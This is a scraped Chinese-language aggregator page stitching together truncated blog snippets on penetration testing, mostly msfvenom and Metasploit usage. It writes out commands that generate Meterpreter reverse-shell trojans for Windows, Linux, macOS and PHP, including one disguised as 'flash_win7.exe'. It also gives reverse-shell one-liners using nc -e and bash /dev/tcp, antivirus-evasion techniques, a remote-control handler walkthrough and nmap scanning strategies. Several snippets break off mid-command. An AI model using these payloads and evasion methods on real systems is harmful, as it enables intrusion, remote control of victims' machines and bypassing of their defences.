msfvenom

转: kali msfvenom生成木马

无人久伴 提交于 2020-02-21 23:54:25
kali msfvenom生成木马 转:https://blog.csdn.net/qq_33391644/article/details/79266724 msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 1.让我们正式开始吧,因为我的目标平台是一个win7 64 位,所以要找一个相应的载荷。 root@kali:~# msfvenom -l | grep windows | grep x64 | grep tcp  //linux可以对应修改 2.生成程序(默认路径是在home下) root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.80.142 lport=443 -f exe X > flash_win7.exe //linux:msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.112 LPORT=4444 -f elf >shell_x64 4.启动msfvenom root@kali:~# msfconsole 5.通过msfconsole开始监听 root@kali:~# use exploit/multi

使用msfvenom生成木马

痞子三分冷 提交于 2020-02-16 10:02:58
Linux   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows   msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe Mac   msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads PHP   msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell

RAT免杀技术

眉间皱痕 提交于 2020-02-11 17:12:30
RAT RAT思维导图下载链接 检测原理 基于二进制文件中特征签名的黑名单检测方法 基于行为的分析方法(启发式) 免杀技术 修改二进制文件中的特征字符 替换、擦除、修改 加密技术(crypter) 通过加密使得特征字符不可读,从而逃避AV检测 运行时分片分段的解密执行,注入进程或AV不检查的无害文件中 防病毒软件的检测 恶意程序本身的特征字符 加密器crypter的特征字符 在线多引擎查杀网站与AV厂商共享信息 https://www.virustotal.com/gui/home/upload http://www.virscan.org/ 搞黑的在线多引擎查毒站 https://nodistribute.com/ 软件保护 软件开发商为保护版权,采用的混淆和加密技术避免盗版逆向 常被恶意程序软件用于免杀目的 Hyperion(32bit程序加密器) Crypter(加密) Container(解密器+PE Loader) 利用模板(正常程序)隐藏shell #msfvenom -p(加载) windows/shell_reverse_tcp -x(使用模板) /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4.4.4.4 -a(操作系统架构) x86 --platform(平台) win(windows) -f

内网渗透之权限维持 - MSF

走远了吗. 提交于 2020-02-02 02:45:58
年初九 天公生 0x034 MSF(美少妇) 启动msf msfconsole 先启动msf依赖的postgresql数据库 初始化数据库 msfdb init (要用普通用户) msf路径 /usr/share 制作后门 msfvenom msfvenom -p payload脚本 lhost=监听/攻击机ip lport=端口 -f 文件类型 -o 文件名 linux示例 msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.223.129 lport=4444 -f elf -o shell windows示例 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.223.129 lport=4444 -f exe -o shell.exe 远控流程 连接后门 1.制作后门上传到目标机并运行 详见上一条 2.开启msf并进入handle模块 use exploit/multi/handler 3.设置payload类型(必须与第一步一致) set payload payload名字 4.设置lhost和lport(与第一步生成的后门一致) set lhost 监听ip set lport 监听端口 5.options查看配置是否正确 6

内网渗透-反弹shell

元气小坏坏 提交于 2020-01-25 02:58:53
大年初一,当然是更一篇重磅文章啦 反弹shell /bin目录下带sh的都是shell nc 1.正向连接,目标机监听自身端口,攻击机主动建立连接 目标机:nc -lvvp 端口 -e /bin/bash (-e cmd.exe) 攻击机:nc -vv 目标IP 监听端口 适用情况:目标机有独立外网ip,攻击机有无都行 2.反向连接,攻击机监听自身端口,目标机主动建立连接 攻击机:nc -lvvp 端口 目标机:nc -vv 攻击机ip 端口 -e /bin/bash 适用情况:攻击机有独立外网ip,目标机在内网,只有一个或多个映射端口 3.聊天/传文件 攻击机:nc -lvvp 端口 < 文件 目标机:nc -vv 攻击机IP 攻击机端口 > 文件 注意:有防火墙会连不上,得找放过的端口 bash 攻击机监听:nc -lvvp 端口 目标机:bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1 把bash重定向 使用kali下msfvenom生成payload msfvenom -l payloads | grep bash #搜索payload制作命令 msfvenom -p cmd/unix/reverse_bash LHOST=攻击机IP LPORT=攻击机端口 #制作payload 目标机运行payload:0<&209-;exec 209<>/dev

【tool】远控免杀专题文章-msfvenom隐藏的参数

末鹿安然 提交于 2020-01-24 22:04:49
本节目录如下: msfvenom简介 msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)都不再被支持。 常规参数 msfvenom所有参数 部分参数解读 -p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表) -e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload -a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64

msfvenom基于zsh的自动补全神器oh-my-zsh的安装教程

北战南征 提交于 2020-01-21 04:31:31
msfvenom基于zsh的自动补全神器oh-my-zsh的安装教程 msf的参数和命令很多,各种payload和encoder让人眼花缭乱,让记忆力和英语不好的人非常难受,一位叫 Green_m 的大佬写了一个zsh插件,可以自动补全msdvenom的命令。 安装后的效果: 是不是很棒棒!接下来就是安装教程。 我的环境是kali 201904,因为安装oh-my-zsh的先提条件是得有zsh,但是kali一般都自带了,所以先安装oh-my-zsh。 切换shell为zsh,再重启一下(可能不是必要的,但我是这样做的) chsh -s /bin/zsh reboot 安装oh-my-zsh sh -c "$(wget https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh -O -)" 接下来下载msfvenom plugin. git clone https://github.com/Green-m/msfvenom-zsh-completion ~/.oh-my-zsh/custom/plugins/msfvenom/ 最后一步,就是配置.zshrc文件,这一步我整了好久才明白··· 安装完oh-myzsh后.zshrc文件默认在root目录下,而且它是隐藏的···

Exp3 免杀原理与实践

烈酒焚心 提交于 2020-01-09 07:10:39
1实验要求 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分) (如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。 1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5) 2实验步骤 检测工具: https://www.virustotal.com/ http://www.virscan.org/ 首先使用VirusTotal或Virscan这两个网站对上次实验生成的后门程序进行扫描。 virustotal virscan 2.1任务一 2.1.1正确使用msf编码器,生成exe文件 使用msf编码器对后门程序进行一次到多次的编码,并进行检测。 一次编码命令: mfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.183.130 LPORT=4308 -f exe > met-encoded.exe 利用之前实验所学,将生成的met-encoded

第十八章——内网渗透之域渗透

柔情痞子 提交于 2019-12-24 12:00:36
渗透学习交流群:773617250进群可免费领取学习工具,群内定期通知直播时间!欢迎大家进群学习交流!感谢大家的支持! MSF 在讲域渗透之前,先给大家讲讲MSF ●kali代理配置 http://pawelli.com/archives/527 ●回顾msf知识 ●针对内网 批量扫描 ms17-010 ●针对域成员 08R2 msf渗透 并提权 要点:针对对方是x64的架构 生成一个x64的反弹shell的exe文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.145 LPORT=6666 -f exe -o shell.exe 可以利用这个模块配合提权multi/recon/local_exploit_suggester 关于msfvenom生成木马: 参数: -p 指定要使用的 msf 的 payload,也可以使用自定义 payload。 -l 列出所有可用的所有可用资源. 模块类型包括: payloads, encoders, nops等。 -n 为 payload 预先指定一个 NOP 滑动长度(一切为了绕过防火墙与免杀)。 -f 指定 payload 输出的文件类型,–help-formats,可查看支持的所有输出格式(默认的输出格式是 raw,直接输出 payload 的字符

渗透测试工具实战技巧合集

自作多情 提交于 2019-12-09 10:18:22
最好的 NMAP 扫描策略 # 适用所有大小网络最好的 nmap 扫描策略 # 主机发现,生成存活主机列表 $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24 $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt # 端口发现,发现大部分常用端口 # http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf $ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt # 端口发现,发现全部端口,但 UDP 端口的扫描会非常慢 $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt # 显示 TCP\UDP 端口 $ grep "open"